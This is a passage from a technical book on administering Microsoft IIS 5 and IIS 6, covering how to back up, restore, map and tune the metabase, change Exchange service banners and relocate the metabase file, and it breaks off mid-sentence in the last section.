+modifications to the metabase while IIS is running. Edit-while-
+running is a new feature of IIS 6 that allows you to edit the
+metabase directly while Iisadmin and other IIS services are still
+running. Whenever the major version number is incremented, the
+minor version number is reset to 0.
+If you plan to use the new history feature of IIS 6it's enabled by
+defaultyou will probably want to modify the history settings to
+suit your needs. The default history settings save a maximum of
+10 history files before overwriting the oldest file. This might not
+be enough history if you plan to edit the metabase extensively;
+you might want to increase this number to 20, 30, or even 100.
+Make sure you have sufficient disk space for all these files,
+however; if IIS can't create a new history file due to insufficient
+
+disk space, it will automatically shut down without warning or
+explanation.
+To change the maximum number of history files IIS should save,
+you'll have to modify a metabase setting directly; there's no way
+to do it from the GUI. The property you need to change is called
+MaxHistoryFiles and it's located in the section (if
+you're navigating the metabase by its key hierarchy) or the LM
+location (if you're navigating by location hierarchy) of the XML
+code. The metabase can be a confusing place; you might take a
+gander at [Hack #56] for guidance.
+After you make changes to the metabase
+directly, check the history folder for any
+error files that might have been created.
+These error files are named in the form
+MetaBaseError_versionnumber.xml and are
+generated when metabase corruption has
+occurred after editing. If you see an error
+file, restore your metabase to the previous
+history version and try editing it again.
+IIS 6 also lets you manually back up the metabase and export
+portions to a text file, similar to what we did in IIS 5. The main
+difference is that in IIS 6 export functionality is built directly
+into the GUI, so you no longer need the old MetaEdit tool for
+exporting. In fact, you can't use MetaEdit with IIS 6 because of
+the metabase's format change from binary to XML.
+
+GUI differences between IIS 5
+and IIS 6
+Backing up the metabase from the GUI is done the same way as
+it was in IIS 5, with a couple of important differences. First, an
+initial metabase backup is automatically performed once you
+install IIS on your machine (to reduce the attack surface of your
+machine, Windows Server 2003 no longer installs IIS by
+default). This initial backup consists of two backup files: an
+*.MD0 file that contains a backup of MetaBase.xml (the metabase
+proper) and an *.SC0 file that holds a backup of MBScehma.xml
+(the XML schema that defines the syntax of MetaBase.xml). Note
+that in IIS 5 the schema is included as part of the single
+metabase.bin file, though in MetaEdit the configuration (LM) and
+schema (Schema) portions of the metabase are displayed as two
+separate nodes. In other words, every time you back up the
+metabase in IIS 6, you back up both the configuration file and
+the schema.
+Here's another difference. In IIS 5, using Internet Services
+Manager, you right-click on the server node and select
+Backup/Restore Configuration. To do this in IIS 6, however, you
+right-click on the server node and select All Tasks
+Backup/Restore Configuration. This is just one example of the
+unnecessary, minor changes in Windows Server 2003 that cause
+frustration for administrators who are used to working with
+Windows 2000.
+You can also now use a password to encrypt metabase backups.
+An encrypted metabase backup can be restored to a different
+IIS machine, which gives you a way to clone the IIS
+configuration of one machine and copy it to another. This was not
+possible in IIS 5; you could restore a metabase backup only to
+
+the same machine and only if you hadn't rebuilt the machine
+onto new hardware after a disaster. This is one of many good
+reasons to upgrade your web servers to Windows Server 2003,
+even if you choose to keep your domain controllers running
+Windows 2000. Just don't forget the password you use to
+encrypt your metabase or you won't be able to restore from the
+saved backup.
+Finally, IIS 6 also includes some scripts that can be used to
+back up and restore the metabase from the command line. For
+more information about these scripts and what they can and
+cannot do, see [Hack #59].
+
+Hack 55 Restore the Metabase
+While it's simple to restore the metabase from a backup, what
+if you have no backup or can't open the GUI? Use this hack.
+In [Hack #54], we explored several ways of backing up the
+metabase, including backing up the machine's System State
+information using the Backup utility, saving the configuration in
+Internet Services Manager with MetaEdit (a downloadable tool
+for IIS 5), and using the history feature of IIS 6.
+Restoring the metabase from backup is equally straightforward.
+If you are recovering your machine from a disaster, the
+metabase is restored as part of the System State information
+you previously backed up, assuming you didn't change the
+default option of including System Protected Files in your
+backup. Alternately, if you're restoring the metabase on a
+working machine to recover a previous good IIS configuration,
+simply select the backup in the Configuration Backup/Restore
+dialog box and click Restore. Then, follow the prompts and wait
+as IIS stops, rebuilds, and restarts. Restoring the IIS 6
+metabase from a history file is done in the same way: just select
+a history file in the Configuration Backup/Restore dialog box and
+click Restore.
+Notice that the dialog box (refer back to Figure 6-2) displays
+both metabase backups stored in
+%SystemRoot%\System32\inetsrv\MetaBack and history files
+stored in %SystemRoot%\System32\inetsrv\History in one
+combined list. You can tell the difference between a history file
+
+and a backup file in this list by looking at the filenames: all
+history files are named Automatic Backup and are distinguished in
+the GUI only by their timestamp, while backup files you create
+are named whatever you decide to call them.
+It all seems so simple, but what if your metabase becomes
+corrupt and you need to restore it from backup? If you can start
+Internet Services Manager, you can use the Configuration
+Backup/Restore dialog box as described earlier. But if the
+metabase is corrupted beyond the ability of IIS to repair it,
+Internet Services Manager might not even start, and then you're
+stuck. What do you do?
+You could restore the entire System State of your machine from
+backup media. Unfortunately, that might have unpleasant side
+effects, especially if you're running IIS on a domain controller.
+For example, all those users and groups you created since the
+last backup will suddenly be gone (unless you have another
+domain controller to replicate the information). There might also
+be changes to the Registry that will be rolled back, and these
+changes might be harder to troubleshoot.
+But there's a better way.
+Manually Restoring a Backup in IIS 5
+If you can't open Internet Services Manager, try replacing the
+metabase with its most recent backup.
+First, stop all IIS services by typing net stop iisadmin /y at the
+command prompt (or use iisreset /stop if you prefer). Then, find
+the metabase.bin file in %Systemroot%\System32\inetsrv and
+rename it metabase.bad (keep it in case you need it later). Copy
+your backup file (it probably has the extension .MD0) from
+
+%Systemroot%\System32\inetsrv\MetaBack to
+%Systemroot%\System32\inetsrv and rename it metabase.bin.
+Now, restart the computer. You should once again have a working
+IIS configuration and be able to start Internet Services Manager.
+By the by, instead of rebooting your machine, you can try to
+restart IIS services by typing iisreset /start from the command
+line. But in my experience, it's better to reboot your machine,
+because IIS is sometimes a little flakey after a restore like this.
+Restoring without metabase
+backups
+What if you don't have any metabase backups in the
+inetsrv\MetaBack folder? Perhaps you deleted them all or you
+never created any in the first place. Hopefully, you do have a
+recent backup of your system driveon tape, perhaps? Use the
+Backup utility to restore the inetsrv folder from backup to a new
+location (C:\inetsrv2, for example) and repeat the previous
+process by copying C:\inetsrv2\metabase.bin over
+%Systemroot%\System32\inetsrv\metabase.bin. Be sure to stop
+the IIS services as before, and reboot the machine when you've
+finished.
+Restoring without a backup on
+tape
+But what if there are no metabase backups in your MetaBack
+
+folder and you don't even have a working backup on tape?
+Here's a hack you can try that just might work: look in the
+inetsrv folder on your machine for files named metabase.bak or
+metabase.bin.bak. If you find one, you're in luck; this is a
+temporary metabase backup created by IIS when it has
+problems updating the metabase due to corruption. Normally,
+this temporary file is deleted once a successful metabase
+update is performed, but if your metabase corruption was caused
+by some interruption in the update process (a server glitch or
+hiccup), IIS might not yet have gotten around to deleting the
+temp file and you can use it to restore your configuration. Simply
+stop the services, rename metabase.bin to metabase.bad, rename
+metabase.bak to metabase.bin, and reboot the machine.
+Reinstalling IIS
+In the worst case scenario, you have no tape backup, nothing in
+the MetaBack directory, and no temporary .bak file in inetsrv. What
+do you do? Use Add/Remove Programs in the Control Panel to
+first uninstall IIS and then reinstall it. After you uninstall it, you
+should also check the %Systemroot%\System32\inetsrv folder
+(which is not deleted by the uninstall process) for a file named
+metabase.bin. If you find one, delete it before reinstalling IIS.
+Moral of the story? Sometimes a reinstall is the only way to
+recover.
+Manually Restoring a Backup in IIS 6
+
+Remember that the metabase in IIS 6 is structured differently
+[Hack #54]; it consists of two files, MetaBase.xml and
+MBSchema.xml, instead of the single metabase.bin file used by IIS
+5. Fortunately, you normally have to restore only the
+MetaBase.xml file, because it's highly unlikely that you would
+have made changes to the schema. The procedures to follow are
+identical to those described in the previous section, except you
+replace metabase.bin with MetaBase.xml in each step where
+metabase.bin occurs. I've also found that restarting IIS by using
+iisreset /start seems to work fine and you don't have to reboot.
+IIS in Windows Server 2003 does seem more robust than IIS in
+Windows 2000.
+See Also
+[Hack #59]
+
+Hack 56 Map the Metabase
+Here are some helpful maps to help you navigate the
+complexities of the metabase.
+While basic IIS configuration can be done using Internet
+Services Manager, sometimes you need to roll up your sleeves
+and look under the hood. Under IIS's hood you'll find the
+metabase, the key repository of IIS configuration information.
+The metabase contains hundreds of settings, from how a web
+server performs to the format used for logging visits to sites.
+Both Windows 2000 and Windows Server 2003 let you edit the
+metabase directly, but the tools you use are different because
+the format of the metabase is different in each platform [Hack
+#54].
+Before you start mucking about in your metabase, you need to
+know your way around, because its structure is quite complex.
+The goal of this hack is to give you a bird's-eye view of how the
+metabase is organized, so you can find things more quickly and
+avoid making mistakes that could confuse your server.
+Surprisingly enough, you won't find this
+information anywhere on Microsoft's web
+site, even though it is crucial to metabase
+exploration.
+
+Once you know the lay of the land, you can start hacking the
+metabase [Hack #57] with a certain level of confidence.
+Logical Structure
+The logical structure is the easiest to consider first, because
+it's much the same for both IIS 5 and IIS 6. The important thing
+to keep in mind is that the metabase hierarchy reflects the way
+you manage IIS web sites, directories, and files using Internet
+Services Manger. For example, when you want to log visits to a
+site on your server, you can use Internet Services Manager to
+enable the Log Visits setting at the site level (for all web content
+on your site), at the virtual-directory level (for content stored in
+a single virtual directory), or at the page level (for monitoring
+traffic to individual pages). Most configuration settings can also
+be configured globally for the entire IIS machine. As a result,
+when you are navigating the properties sheets of Internet
+Services Manager, you'll see the following hierarchical
+progression: Server Site Directory File.
+The logical structure of the metabase is organized similarly and
+uses a location attribute to identify where a setting lies within
+the hierarchy. The top of this hierarchy is called LM, which stands
+for Local Machine (i.e., the server itself). Each metabase key then
+has a location attribute that identifies where the key resides. As
+a simple example, the Path key located at LM/W3SVC/1/ROOT
+contains the string value C:\Inetpub\wwwroot and identifies the
+location of the content for the Default Web Site. Figure 6-3
+shows where this key is located in the IIS 5 metabase using
+MetaEdit, the tool used for editing the metabase on that
+
+platform. Note that the metabase is organized hierarchically,
+using keys in a fashion similar to the way the Windows Registry
+is displayed in RegEdit.
+Figure 6-3. Path key for Default Web Site in the
+IIS 5 metabase
+To understand the location LM/W3SVC/1/ROOT, let's break it down:
+LM is the local machine itself, W3SVC means we're looking at web
+sites (not FTP, SMTP, or NNTP), 1 is the site ID for the Default
+Web Site, and ROOT contains configuration settings (keys) that
+apply to all virtual directories and files within the web site. The
+site ID is a number generated for each web site on the server to
+uniquely identify the site internally.
+
+Location map for IIS 5
+Now, here is the big picture of how the IIS 5 metabase is
+logically organized, omitting some of the deeper levels:
+LM
+LM/IISADMIN
+LM/IISADMIN/EXTENSIONS
+LM/IISADMIN/PROPERTYREGISTRATION
+LM/Logging
+LM/Logging/Custom Logging
+LM/Logging/Microsoft IIS Log File Format
+LM/Logging/NCSA Common Log File Format
+LM/Logging/ODBC Logging
+LM/Logging/W3C Extended Log File Format
+LM/MimeMap
+LM/W3SVC
+LM/W3SVC/1
+LM/W3SVC/1/Filters
+LM/W3SVC/1/IIsCertMapper
+
+LM/W3SVC/1/ROOT
+LM/W3SVC/2
+LM/W3SVC/2/filters
+LM/W3SVC/2/root
+LM/W3SVC/Filters
+LM/W3SVC/Info
+Not so complicated after all, is it? The main locations under LM
+are pretty self-explanatory. For example, IISADMIN contains
+configuration settings for the IISAdmin service, Logging defines
+the settings for the different logging formats supported by IIS,
+and MimeMap has a copy of the MIME mappings that define how
+IIS responds to client requests for files with particular
+extensions. Everything under W3SVC relates to the World Wide
+Web Publishing Services on the machine, which you can see is
+hosting two web sites: the Default Web Site (site ID 1) and a
+custom web site (site ID 2). If your server is running additional
+services, such as FTP, you'll also find locations for those within
+the hierarchy.
+Of course, before you can successfully hack the metabase, you
+need to know how to find the site ID for a given web site and vice
+versa. In IIS 6, this is easily done. Select the Web Sites node in
+Internet Services Manager and look under the Identifier column
+in the pane on the right. This displays the site ID for each web
+site running on the server.
+Finding the site ID under IIS 5 is a little trickier. If you want to
+find the site ID for a particular site, open its properties sheet in
+
+Internet Services Manager, choose the Web Site tab, and click
+the Properties button in the Logging section at the bottom. If
+you have W3C Extended Log File Format configured (the
+default), then the site ID is embedded in the name of the folder
+in which your IIS log files are saved. In our example, these
+folders are %SystemRoot%\System32\LogFiles\W3SVC1 for the
+Default Web Site and %SystemRoot%\System32\LogFiles\W3SVC2
+for the custom web site. Figure 6-4 shows the Extended Logging
+Properties dialogue box for the custom web site.
+Figure 6-4. Finding the site ID for a web site in
+IIS 5
+
+Of course, if you have dozens of web sites running on your
+machine, this is a rather slow approach. As a workaround you
+can use findweb.vbs, one of the sample administrator scripts
+included in the Inetpub\AdminSamples folder on IIS 5. Drop to a
+command prompt and type cscript findweb.vbs sitename, where
+sitename is the descriptive name of your site in Internet Services
+Manager. Be sure to use quotes if there are spaces in the site
+name. The output of the script will include the web site
+numberanother name for the site ID. For more information about
+
+using scripts to administer IIS, see [Hack #59].
+What about the reverse? Given a site ID within the metabase,
+how do you find the descriptive name of the web site as
+displayed in Internet Services Manager? One way is to use
+MetaEdit to view the contents of the ServerComment key in the
+location LM\W3SVC\n, where n is the site ID for the web site. The
+data value for this key is the descriptive name of the site in
+Internet Services Manager.
+Location map for IIS 6
+IIS 6 is logically organized similarly to IIS 5, but with a few
+differences:
+.
+/
+/LM
+/LM/IISADMIN
+/LM/IISADMIN/EXTENSIONS
+/LM/IISADMIN/PROPERTYREGISTRATION
+/LM/Logging
+/LM/Logging/Custom Logging
+/LM/Logging/Microsoft IIS Log File Format
+
+/LM/Logging/NCSA Common Log File Format
+/LM/Logging/ODBC Logging
+/LM/Logging/W3C Extended Log File Format
+/LM/MimeMap
+/LM/W3SVC
+/LM/W3SVC/1
+/LM/W3SVC/1/Filters
+/LM/W3SVC/1/IIsCertMapper
+/LM/W3SVC/1/ROOT
+/LM/W3SVC/388907640
+/LM/W3SVC/388907640/filters
+/LM/W3SVC/388907640/root
+/LM/W3SVC/AppPools
+/LM/W3SVC/AppPools/DefaultAppPool
+/LM/W3SVC/Filters
+/LM/W3SVC/Info
+Here, we see that LM is the third level instead of the root. The
+root level (.) contains keys for versioning (timestamp and
+
+change number) and history major version number [Hack #54].
+The next level (/) contains an AdminACL key used for protecting
+the metabase against unauthorized modification. Beyond that,
+everything under LM is pretty much the same as in IIS 5, with the
+obvious exception of /LM/W3SVC/AppPools and locations beneath it,
+which contain information about application pools when IIS 6 is
+running in worker process isolation mode.
+Another thing to notice is that the site ID for the custom web
+site is 388097640 instead of 2. While IIS 5 assigns site IDs to new
+web sites serially (1, 2, and so on), IIS 6 assigns what looks like
+a random number as a web site's site ID. Actually, it's not
+random at all; it's a pseudorandom number derived from
+scrambling the descriptive name of the web site. So, if you have
+two web servers, each with a custom site named My Company
+Site, they'll both be assigned the same site ID in IIS 6. The
+reason for doing it this way is to ensure that web farms with
+multiple IIS machines that host copies of sites have identical
+site IDs for mirrored sites. If you prefer, you can disable this
+feature via the Registry Editor; simply add a new REG_DWORD value
+to the HKLM\SOFTWARE\Microsoft\InetMgr\Parameters key, give the
+new value the name IncrementalSiteIDCreation, and assign it a
+value of 1. Restart IIS to jog the change into effect. This might
+be useful in a service provider environment, for example, if you
+have several IIS machines that host thousands of web sites and
+you don't want to worry about having two users create sites with
+the same descriptive name.
+Finally, be aware that while the basic logical structure of the
+metabase is almost identical in IIS 5 and IIS 6, there are many
+new metabase keys in IIS 6 that have no counterpart in IIS 5.
+Also, some IIS 5 keys have been retired or renamed in IIS 6. A
+full discussion of these items is obviously beyond the scope of
+this book; thankfully, I have another for you which does discuss
+this stuff at length: IIS 6 Administration (Osborne/McGraw-Hill).
+
+Physical Structure
+On IIS 5, the physical structure of the metabase is hidden
+within the proprietary format of the binary metabase.bin file, so
+you need to know only the logical structure (location of keys) to
+find your way around the metabase using MetaEdit. Things are
+different in IIS 6, however, because here the metabase is a plain
+text file (MetaBase.xml) that is formatted in XML and adheres to
+strict constraints laid down by the schema (MBScehma.xml). In
+the XML syntax for the metabase, the location of a key is given
+by its location attribute within the XML tag for the key. For
+example, the Path key previously discussed for the Default Web
+Site in IIS 5 looks like this in the IIS 6 metabase:
+
+
+If you know a little XML, you can see that IIsWebVirtualDir is an
+element whose attributes include Location and Path, contained
+within a pair of opening and closing tags. To be accurate,
+IIsWebVirtualDir is itself a property called KeyType, and I've left
+out some other attributes to make the basic structure clear.
+Anyway, by editing this section of the MetaBase.xml file directly,
+using a text editor such as Notepad, you can easily change the
+default path for the home directory of the Default Web Site.
+XML map for IIS 6
+
+So, now let's see the big picture of what the IIS 6 metabase
+looks like in terms of XML tags instead of location. This is
+important to know, because while the location map described
+earlier really defines the hierarchical structure of metabase
+keys, the actual physical metabase file is formatted in XML and
+that's what you have to look at when you edit it. Anyway, here's
+the XML for an IIS 6 machine configured with two web sites
+(keys that can be repeated are indicated with ellipses):
+
+
+
+IIS_Global
+IIS_ROOT
+IIsComputer
+IIsConfigObject...
+IIsLogModules
+IIsCustomLogModule...
+IIsLogModule...
+IIsMimeMap
+IIsWebService
+IIsWebServer
+IIsFilters
+
+IIsCertMapper
+IIsWebVirtualDir
+IIsWebServer
+IIsFilters
+IIsWebVirtualDir
+IIsApplicationPools
+IIsApplicationPool
+IIsFilters
+IIsFilter
+IisCompressionScheme...
+IIsCompressionSchemes
+IIsWebInfo
+IIsConfigObject
+IIsWebServer
+IIsWebVirtualDir
+IIsWebServer
+IIsWebVirtualDir
+
+
+
+As you can see from the duplicate sections beginning with
+IIsWebServer, two web sites are running on this machine. If you
+examine the details of these sections, you'll find they have
+identical KeyType attributes but different Location attributes. Also,
+note that unlike the location map, which accurately reflects the
+hierarchical structure of metabase keys, the XML map shows
+that the MetaBase.xml file is almost flat, with all KeyType attributes
+nested equally within tags, which themselves are
+nested within global tags.
+Of course, the metabase can get much more complicated if you
+have additional web sites, directories, and services installed.
+But now that you know the basic lay of the land, you should be
+able to find your way about. Just don't forget to back up the
+metabase before you start hacking away at it!
+
+Hack 57 Metabase Hacks
+Here are 10 things you might want to change with IIS, but you
+can do them only by editing the metabase.
+These are a few of my favorite IIS metabase hacks. You can find
+lots more informationtoo much, perhapsin the IIS SDK's IIS
+Metabase Properties Reference on MSDN
+(http://msdn.microsoft.com/library/en-
+us/iisref/htm/reference.asp). Most of the information there is
+pretty dry stufflists of different settings that provide little insight
+into what might be useful to tweakwhich is why I want to start
+you off with a few interesting hacks to inspire you. Still, it is a
+good idea to get familiar with how to read the Reference, because
+it details the allowable values for each property in the metabase.
+Except where stated otherwise, all of the following hacks work on
+both IIS 5 and IIS 6, though the effect in some cases might
+differ depending on the rest of your IIS configuration; I try to
+make note of such differences when appropriate. Also, most of
+these properties require IIS to be restarted before they take
+effectsomething that's usually a good idea anyway whenever you
+edit the metabase manually. Even on IIS 6, which lets you edit
+the metabase while IIS services are running, it's often a good
+idea to use the iisreset command to stop and start IIS after
+making metabase changes and see if there is any effect.
+
+A Warning Before Hacking the
+Metabase
+Before you start hacking the metabase, remember that
+editing the metabase (like editing the Registry)
+shouldn't be done lightly; the preferred method is to
+configure IIS using the Internet Services Manager GUI
+tool. Unfortunately, a number of useful metabase
+settings are inaccessible from the GUI and you have to
+dig right into the metabase to change them.
+Also, before you edit the metabase make sure you back
+it up. That way, if you make a mistake and break IIS,
+you can restore the metabase from backup and get IIS
+working again. We looked at ways you can back up the
+metabase [Hack #54] earlier in this chapter, but it's
+also a good idea to make a copy of the metabase and
+edit the copy instead of editing the metabase itself.
+Then, when you've made your changes, you can stop
+IIS, rename metabase.bin to metabase.old, rename your
+copy of the metabase from whatever you called it to
+metabase.bin, and restart IIS. Should something go
+wrong, your original metabase is still there in the form of
+metabase.old and can be used to restore IIS to the
+configuration it had previously. That may sound like
+overkill, but you can never be too careful when it comes
+to manually editing critical configuration files. You
+should at least follow that procedure with IIS 5
+(Windows 2000). With IIS 6 (Windows Server 2003),
+you can probably get by without following this approach,
+because the history feature saves a copy of the
+metabase every time you make a configuration change
+to it. You decide, though. Like most things in IT, it's a
+tradeoff, and in this case, the tradeoff is between
+
+convenience and safety. Making backups of backups is
+not convenient, but it might help prevent you from
+burning your fingers.
+Also remember that MetaEdit (the downloadable tool for
+editing the IIS 5 metabase) doesn't check your
+modifications to ensure that the values you entered are
+within the allowable range for the properties you edit.
+Editing the IIS 6 metabase using Notepad or some
+other text editor is even more dangerous, because you
+could even assign a string value to a metabase property
+that should be numeric. So, before you change any
+metabase property manually, check the Reference to
+see which range of values is allowed.
+ServerListenBacklog
+Sometimes, IIS cracks under the weight of too many client
+requests, even though it still has lots of memory and CPU
+cycles to work with. Typically, clients start getting "Server too
+Busy" errors and have to click Refresh several times before they
+are able to see any content. At the server end, this might
+happen on only one IP address, and any others might behave as
+they should. With a packet-sniffing tool such as the Microsoft
+Systems Management Server's Network Monitor, you'll see TCP
+connections resetting almost as soon as they are established.
+The problem is that the application layer of the TCP/IP stack
+has run out of resources. To increase the resources available for
+
+this layer, you can edit two metabase properties:
+ServerListenBacklog and MaxEndPointConnections (we will discuss
+the latter in the next section).
+The ServerListenBacklog property determines the maximum
+number of outstanding TCP socket connections that can be
+queued. By default, this property is set in the metabase schema
+and depends on how the Performance Tuning setting is
+configured on the Performance tab of your web server's
+properties sheet in the GUI. Specifically, ServerListenBacklog has
+defaults of 5, 40, or 100, depending on whether you tune the GUI
+to expect fewer than 10,000 hits per day, less than 100,000
+hits per day, or more than 100,000 hits per day. You can
+override the schema defaults for this property by adding a
+ServerListenBacklog key at the web site's level (/LM/W3SVC) or at
+the level of an individual web site, such as the Default Web Site
+(/LM/W3SVC/1); assign the ServerListenBacklog key any value from
+5 to 1000 (on IIS 5) or 500 (on IIS 6). More pending connections
+are queued as you increase the value for this key, but IIS will
+consume more memory resources. Experiment to find the best
+performance for your hardware.
+MaxEndPointConnections
+Another property you can tweak to improve performance under
+heavy load is MaxEndPointConnections, which indicates the
+maximum number of TCP sockets in a LISTENING state that
+can be allowed for a single IP address, network interface, or TCP
+port. By default, this property has the value 100 on IIS 5 and is
+also set in the schema, but you can add a key to set it at the
+/LM/W3SCV level or the /LM/W3SVC/n level, where n is the site ID of
+the web site that contains the application. To get better
+
+performance under heavy load, try increasing this setting to 500
+or even higher and evaluate the result from the client standpoint.
+On IIS 5, MaxEndPointConnections works in conjunction with
+ServerListenBacklog and IIS uses the property with the lower
+value by default. On IIS 6, however, MaxEndPointConnections is set
+to 4294967295 in the schema, which means unlimited connections
+and is usually best left as is.
+AspThreadGateEnabled
+Thread gating is a feature of IIS that is turned off by default, but
+if you turn it on, IIS dynamically adjusts the number of
+concurrent threads, depending on the load. If threads become
+blocked (for example, when an ASP application on IIS has to
+wait for a back-end SQL database to respond), then IIS starts
+more threads to handle client requests. If processor usage hits
+the wall, IIS begins decommissioning threads to reduce the
+amount of context switching going on. The lower- and upper-
+level CPU usages that start or kill threads are determined by
+two other metabase properties: AspThreadGateLoadLow and
+AspThreadGateLoadHigh. By default, these properties have values
+of 50 and 80 (percent), respectively, but you can change them to
+see if it improves performance.
+I've sometimes found that changing AspThreadGateEnabled from off
+(0) to on (1) can improve performance somewhat for web servers
+that host mainly static content. For servers that host ASP
+applications, use the Performance console first to check if ASP
+requests are becoming excessively queued. If so, try changing
+AspThreadGateEnabled to 1 and use Performance again to see if
+things improve.
+This key is already present in the metabase at the /LM/W3SCV
+
+level, but you can also set it at the /LM/W3SVC/n level by creating
+the appropriate key. Note that this particular metabase property
+applies only to IIS 5, not IIS 6.
+AspProcessorThreadMax
+The AspProcessorThreadMax property determines the maximum
+number of worker threads IIS allows for handling ASP requests.
+The default value is 25 (threads per processor), and if you
+multiply the number of processors on your machine by the value
+of AspProcessorThreadMax, the product represents the maximum
+number of threads that can service a single ASP
+applicationregardless of how you have tweaked the previously
+described AspThreadGateLoadHigh property. In some cases, you
+might want to try increasing this valuefor example, when ASP
+requests are being blocked by slow response from a back-end
+database. In other cases, decreasing it to 15 or even 5 might
+improve performance by better utilizing available processor
+resources, especially under relatively light loads. Basically, just
+play with it and see what happens. This property is defined at the
+/LM/W3SCV level, but you can also set it at the /LM/W3SVC/n level.
+AspAllowSessionState
+The AspAllowSessionState property enables session state
+persistence for ASP applications and is set to 1 (on) by default.
+One way you can often improve ASP performance is to change
+this property to 0 (off) and then recode your applications to
+explicitly override session state persistence for pages that use
+session objects. Simply add the following statement to the top of
+
+each ASP page as needed:
+<% @EnableSessionState=False %>
+This property is defined at the /LM/W3SCV level, but you can also
+set it at the /LM/W3SVC/n level.
+AspBufferingOn
+Big improvements in ASP performance can often be achieved by
+turning ASP buffering on using the AspBufferingOn property. This
+is because ASP buffering lets IIS collect the output of an ASP
+application in a buffer before flushing it to the client. Fortunately,
+this property is set to 1 (on) in IIS, provided you're working with
+a clean installation of Windows 2000 or Windows Server 2003.
+If you previously upgraded your web server from Windows NT
+4.0, however, this property is set to 0 (off) and should generally
+be changed to 1, at least on all your production servers.
+However, while turning this property on increases ASP response
+times overall, from a user perspective it might actually seem to
+make sites less responsive. This is because instead of feeding
+the output of the ASP page to the user slowly, bit by bit, the
+entire output has to be generated and cached before any of it
+can be returned to the user. So, you'll have to play with this and
+see what how it feels from a client perspective, but in most
+cases it's best left turned on. You can also recode your ASP
+applications to make more use of the Response.Flush method to
+improve the performance from the user's point of view. This
+property is defined at the /LM/W3SCV level, but you can also set it
+at the /LM/W3SVC/n level.
+
+AspQueueConnectionTestTime
+Ever tried to access a page that wouldn't load, so you kept
+refreshing impatiently? On the older IIS 4 platform, this had the
+unpleasant result of filling up the ASP request queue with
+multiple requests from the same user for the same page, which
+was quite annoying. Fortunately, in IIS 5 the
+AspQueueConnectionTestTime metabase property was added to foil
+this kind of unintentional denial-of-service attack on your web
+server. The default value for this key is 3 (seconds), but you can
+tweak it depending on how your ASP application is designed. For
+example, if you have an application in which the user usually just
+clicks through a number of pages without needing to fill in or
+read anything, you could add this key to the /LM/W3SVC/n level for
+that site and lower its value to 2 or even 1. That way, IIS will
+check more frequently to make sure the client is still connected
+before responding to another connection request from the same
+client. This property is defined at the /LM/W3SCV level, but you can
+also set it at the /LM/W3SVC/n level.
+AspScriptFileCacheSize
+The AspScriptFileCacheSize property determines how many
+precompiled script files or templates are cached in memory by
+IIS, in case they need to be reused. The default value for this
+setting is 250 (in IIS 5) or 500 (in IIS 6), but this can be
+increased to 1000 or more if needed. You can also set it to -1 (on
+IIS 5) or 4294967295 (on IIS 6) to allow unlimited caching of
+scripts. Unlimited caching is probably not a good idea unless
+you have unlimited RAM on your motherboard, but you definitely
+might consider increasing this setting to 1000 or higher if your
+
+server is running applications that have many different ASP
+pages. This property is defined at the /LM/W3SCV level, but you
+can also set it at the /LM/W3SVC/n level.
+CacheISAPI
+The CacheISAPI property determines whether IIS caches ISAPI
+extensions (such as asp.dll) in memory or unloads them
+whenever they're no longer used. This is set to 1 (on) and should
+be left that way on production servers, unless you want your
+applications to run like molasses. However, if you need to debug
+a custom ISAPI extension you've written, set CacheISAPI to 0
+(off); otherwise, you'll end up testing previous versions of your
+extension instead of testing the current one. This property is
+defined at the /LM/W3SCV level, but you can also set it at the
+/LM/W3SVC/n level.
+ID 36907
+I'll end this list of hacks with something a little bit different.
+Until now, we've looked only at metabase properties for IIS
+proper. However, some other Microsoft products also use IIS;
+one of the most notable is Exchange 2000 Server. Every
+metabase property is uniquely identified by an internal ID
+number. For example, the CacheISAPI property has ID number
+6034, which can easily be seen using MetaEdit (see Figure 6-5).
+Figure 6-5. Viewing the CacheISAPI property in
+MetaEdit
+
+It's a little-known fact that these ID numbers are grouped into
+different ranges that depend on the IIS function to which they
+apply (IIS, ASP, or FrontPage) or the Microsoft server product to
+which they belong (such as Exchange Server or Application
+Center). Table 6-1 details the association between metabase
+Ids and their associated functions or products.
+Table 6-1. Metabase property ID ranges
+ID range Function/Product
+1-32767 IIS
+28672-32767 ASP (subset)
+
+32768-36863 FrontPage Server Extensions
+36864-40959 Exchange Server: SMTP
+40960-45055 Exchange Server: POP3
+45056-49151 Exchange Server: NNTP
+49152-53247 Exchange Server: IMAP4
+53248-57343 MSCS
+57344-61439 Application Center
+Metabase property 36907 falls within the range of Exchange's
+SMTP Service and can be used to change the default SMTP
+banner with which Exchange responds to incoming client
+connections. Changing the property's banner from its
+defaultESMTP MAIL Service, Version: 5.0.2195.1600 (or something
+similar)is a useful security measure, because it hides Exchange
+from unauthorized Telnet connection attempts issued by
+attackers who are trying to footprint your system.
+To change the banner for property 36907, open MetaEdit and find
+/LM/Smtpsvc/n, where n is the number of the SMTP virtual server
+used by Exchange. Then, select Edit New String from
+the menu to open the Edit Metabase Data dialog box (shown in
+
+Figure 6-6).
+Figure 6-6. Adding a new property to the
+metabase based on its internal ID number
+Since the Id drop-down box lists only standard IIS metabase
+properties, you have to add this property using its ID number
+instead. Leave the list box set to (Other) and type 36907 in the
+box beside it. Then, in the Data text box, type the banner you
+want the SMTP Service to display to clientsperhaps something
+like "Stop trying to footprint my server!" Finally, stop and restart
+the SMTP Service on your machine. Now, when a Telnet client
+tries to connect on port 25, he'll get the message you specified.
+Of course, you might not want to use that particular message; it
+might only annoy the attacker and make her even more
+
+determined to crack your system!
+By the way, you can do the same thing with your POP3
+connection and disconnection strings (IDs 41661 and 41662,
+respectively) and your IMAP4 connection and disconnection
+strings (IDs 49884 and 49885, respectively). Be sure to restart
+these services once you modify their metabase settings.
+
+Hack 58 Hide the Metabase
+Protect the metabase on your critical web servers by hiding its
+name and location from attackers.
+Good security begins with pretty obvious things, such as
+renaming the default administrator account and assigning it a
+strong password. The same is true for the metabase, the
+database used by IIS to store its configuration information. In
+Windows 2000, the metabase file is metabase.bin and is located
+in the %SystemRoot%\System32\inetsrv directory. By changing
+both the name and location of the metabase, you can hide it from
+malicious hackers, making it harder for them to corrupt the
+configuration of your web servers.
+Changing the name of the metabase first involves stopping the
+IIS Admin Service. This can be done either from the GUI, by
+using Internet Services Manager (right-click on the server node
+and select Restart IIS), or by typing net stop iisadmin /y at the
+command line. Once IIS is stopped, make a copy of
+metabase.bin before you proceed, just in case something goes
+wrong, and store this copy offline on a network share or floppy.
+Then, move metabase.bin to a new folder on your server, making
+sure the NTFS permissions on the folder include Full Control for
+the built-in SYSTEM identity and the built-in Administrators local
+group on the machine. IIS requires these permissions to load
+the metabase into memory and modify its contents when you
